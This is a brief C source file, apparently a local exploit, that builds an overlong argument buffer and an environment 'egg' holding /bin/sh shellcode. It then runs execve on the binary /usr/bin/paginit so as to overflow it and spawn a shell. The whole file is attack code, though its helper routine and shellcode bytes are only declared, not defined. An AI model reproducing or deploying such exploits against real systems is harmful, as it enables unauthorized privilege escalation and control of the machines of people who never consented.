
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int BUFFERSIZE ;
 int EGGSIZE ;
 int cex_load_environment (char*,char*,char*,int ,int ) ;
 int execve (char*,char**,char**) ;
 scalar_t__ malloc (int ) ;
 int shellcode_binsh ;

int main()
{
    char *buffer, *egg;
    char *args[3], *envs[2];

    buffer = (char *)malloc(BUFFERSIZE);
    egg = (char *)malloc(EGGSIZE);

    cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);

    args[0] = "/usr/bin/paginit";
    args[1] = buffer;
    args[2] = ((void*)0);

    envs[0] = egg;
    envs[1] = ((void*)0);

    execve( "/usr/bin/paginit", args, envs );

    return( 0 );
}
